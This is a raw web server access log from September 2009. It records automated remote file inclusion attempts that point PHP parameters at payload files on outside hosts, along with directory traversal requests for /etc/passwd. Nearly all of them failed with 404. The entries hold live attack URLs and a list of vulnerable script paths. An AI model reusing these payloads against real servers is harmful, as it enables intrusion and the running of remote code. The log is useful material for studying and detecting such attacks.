199.120.90.223 - - [10/Sep/2009:23:42:31 -0500] "GET /logs/setup.php?dir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
199.120.90.223 - - [10/Sep/2009:23:42:31 -0500] "GET /logs/access_log.1236211200/setup.php?dir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
199.120.90.223 - - [10/Sep/2009:23:43:54 -0500] "GET /logs/access_log.1237075200/setup.php?dir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.207.139 - - [10/Sep/2009:23:46:37 -0500] "GET /logs/access_log.1220313600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.206 - - [10/Sep/2009:23:46:37 -0500] "GET /logs/access_log.1247875200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
161.58.160.13 - - [10/Sep/2009:23:47:41 -0500] "GET /index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 280 "-""Mozilla/5.0"
161.58.160.13 - - [10/Sep/2009:23:47:42 -0500] "GET /logs/index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 285 "-""Mozilla/5.0"
161.58.160.13 - - [10/Sep/2009:23:47:42 -0500] "GET /logs/access_log.1241308800/index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 307 "-""Mozilla/5.0"
161.58.160.13 - - [10/Sep/2009:23:47:44 -0500] "GET /logs/access_log.1247443200/index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 307 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:28 -0500] "GET /index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:31 -0500] "GET /logs/access_log.1243555200/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:33 -0500] "GET /logs/access_log.1246665600/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:36 -0500] "GET /logs/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
65.55.106.135 - - [10/Sep/2009:23:49:38 -0500] "GET /logs/access_log.1213920000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.247.60.3 - - [10/Sep/2009:23:49:52 -0500] "GET /logs/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:52 -0500] "GET /index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:52 -0500] "GET /logs/access_log.1246665600/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:49:54 -0500] "GET /logs/access_log.1243555200/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:51:30 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:51:30 -0500] "GET /logs/access_log.1250985600/skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:51:30 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:51:40 -0500] "GET /logs/access_log.1251763200/skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:14 -0500] "GET /skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:14 -0500] "GET /logs/skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:14 -0500] "GET /logs/access_log.1250985600/skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:22 -0500] "GET /logs/access_log.1251763200/skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:32 -0500] "GET /skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:32 -0500] "GET /logs/skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:32 -0500] "GET /logs/access_log.1250985600/skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:52:45 -0500] "GET /logs/access_log.1251763200/skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
117.74.98.18 - - [10/Sep/2009:23:52:51 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
117.74.98.18 - - [10/Sep/2009:23:52:51 -0500] "GET /logs/access_log.1248048000////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
117.74.98.18 - - [10/Sep/2009:23:52:51 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:53:38 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:53:38 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:53:39 -0500] "GET /logs/access_log.1250985600/skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:53:59 -0500] "GET /logs/access_log.1251763200/skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:54:46 -0500] "GET /logs/access_log.1247097600/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:54:48 -0500] "GET /logs/skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:54:49 -0500] "GET /skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:54:49 -0500] "GET /logs/access_log.1250985600/skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:55:12 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:55:12 -0500] "GET /logs/access_log.1238371200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:55:13 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:55:13 -0500] "GET /logs/access_log.1238371200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:55:13 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:55:13 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:55:13 -0500] "GET /logs/access_log.1251763200/skin/happycast_category_bluishgreen_eng/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
125.247.60.3 - - [10/Sep/2009:23:55:35 -0500] "GET /logs/access_log.1247097600/index.php?configFile=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:55:41 -0500] "GET /logs/skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:55:41 -0500] "GET /skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:55:41 -0500] "GET /logs/access_log.1250985600/skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:55:48 -0500] "GET /logs/access_log.1251763200/skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:56:08 -0500] "GET /logs/access_log.1250985600/skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:56:08 -0500] "GET /skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:56:08 -0500] "GET /logs/skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:56:35 -0500] "GET /logs/access_log.1251763200/skin/happycast_category_bluishgreen_eng/write.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:42 -0500] "GET /setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:42 -0500] "GET /logs/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:42 -0500] "GET /logs/access_log.1250985600/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:56:45 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:56:45 -0500] "GET /logs/access_log.1248134400//PhpLinkExchange/bits_listings.php?svr_rootP=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:56:45 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:50 -0500] "GET /login.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:50 -0500] "GET /logs/login.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:50 -0500] "GET /logs/access_log.1250985600/login.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:58 -0500] "GET /logs/access_log.1251763200/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:56:59 -0500] "GET /logs/access_log.1251763200/login.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:57:02 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:57:02 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:57:14 -0500] "GET /logs/access_log.1248134400//PhpLinkExchange/bits_listings.php?svr_rootP=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:23:57:23 -0500] "GET /logs/access_log.1244160000/index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:23:57:24 -0500] "GET /index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:23:57:24 -0500] "GET /logs/index.php?visualizar=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
65.55.230.164 - - [10/Sep/2009:23:57:42 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/4.0"
65.55.230.164 - - [10/Sep/2009:23:57:43 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 200 557926 "-""Mozilla/4.0"
86.39.131.85 - - [10/Sep/2009:23:57:45 -0500] "GET /logs/access_log.1244505600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
86.39.131.85 - - [10/Sep/2009:23:57:45 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
86.39.131.85 - - [10/Sep/2009:23:57:45 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
86.39.131.85 - - [10/Sep/2009:23:57:45 -0500] "GET /logs/access_log.1239321600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:58:03 -0500] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:58:03 -0500] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:58:03 -0500] "GET /logs/access_log.1244764800///index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
86.39.131.85 - - [10/Sep/2009:23:58:23 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
86.39.131.85 - - [10/Sep/2009:23:58:23 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
86.39.131.85 - - [10/Sep/2009:23:58:23 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:58:29 -0500] "GET /logs/access_log.1244764800///index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:58:29 -0500] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:58:29 -0500] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:58:40 -0500] "GET /skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:58:41 -0500] "GET /logs/skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:58:41 -0500] "GET /logs/access_log.1250985600/skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
88.157.45.177 - - [10/Sep/2009:23:58:48 -0500] "GET /logs//kalender.php?vis=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""-"
88.157.45.177 - - [10/Sep/2009:23:58:48 -0500] "GET //kalender.php?vis=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""-"
88.157.45.177 - - [10/Sep/2009:23:58:48 -0500] "GET /logs//kalender.php?vis=./../../../../../../../../etc/passwd HTTP/1.1" 404 301 "-""-"
88.157.45.177 - - [10/Sep/2009:23:58:48 -0500] "GET //kalender.php?vis=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-""-"
82.179.197.137 - - [10/Sep/2009:23:58:54 -0500] "GET /logs/access_log.1251763200/skin/happycast_category_bluishgreen_eng/setup.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
161.58.160.13 - - [10/Sep/2009:23:59:03 -0500] "GET /logs/index2.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 286 "-""Mozilla/5.0"
161.58.160.13 - - [10/Sep/2009:23:59:03 -0500] "GET /index2.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 281 "-""Mozilla/5.0"
161.58.160.13 - - [10/Sep/2009:23:59:09 -0500] "GET /logs/access_log.1244764800/index2.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 308 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:23:59:33 -0500] "GET /logs/index2.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:23:59:33 -0500] "GET /index2.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:23:59:33 -0500] "GET /logs/access_log.1244764800/index2.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
86.39.131.85 - - [11/Sep/2009:00:01:30 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
86.39.131.85 - - [11/Sep/2009:00:01:30 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
86.39.131.85 - - [11/Sep/2009:00:01:30 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.207.51 - - [11/Sep/2009:00:02:08 -0500] "GET /logs/access_log.1165622400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
86.39.131.85 - - [11/Sep/2009:00:02:40 -0500] "GET /logs/access_log.1240531200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
91.202.4.158 - - [11/Sep/2009:00:03:14 -0500] "GET /logs//page.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
91.202.4.158 - - [11/Sep/2009:00:03:14 -0500] "GET //page.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
91.202.4.158 - - [11/Sep/2009:00:03:14 -0500] "GET /logs//page.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
91.202.4.158 - - [11/Sep/2009:00:03:14 -0500] "GET //page.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
161.58.160.13 - - [11/Sep/2009:00:06:35 -0500] "GET /logs/noticias.php?arq=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 288 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:00:06:35 -0500] "GET /noticias.php?arq=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 283 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:00:06:35 -0500] "GET /logs/access_log.1251763200/noticias.php?arq=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 310 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:00:06:36 -0500] "GET /logs/login.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:00:06:36 -0500] "GET /logs/access_log.1236038400/login.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:00:06:36 -0500] "GET /login.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:00:08:22 -0500] "GET //admin/admin_status.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:00:08:22 -0500] "GET /logs//admin/admin_status.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:00:08:22 -0500] "GET /logs/access_log.1238112000//admin/admin_status.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:00:08:23 -0500] "GET /logs//admin/admin_status.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:00:08:23 -0500] "GET //admin/admin_status.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:00:08:23 -0500] "GET /logs/access_log.1238112000//admin/admin_status.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:00:09:09 -0500] "GET /logs/access_log.1244764800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:00:09:09 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:00:09:09 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:00:09:09 -0500] "GET /forum.php?act=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 280 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:00:09:09 -0500] "GET /logs/forum.php?act=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 285 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:00:09:09 -0500] "GET /logs/access_log.1251763200/forum.php?act=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 307 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:00:09:15 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
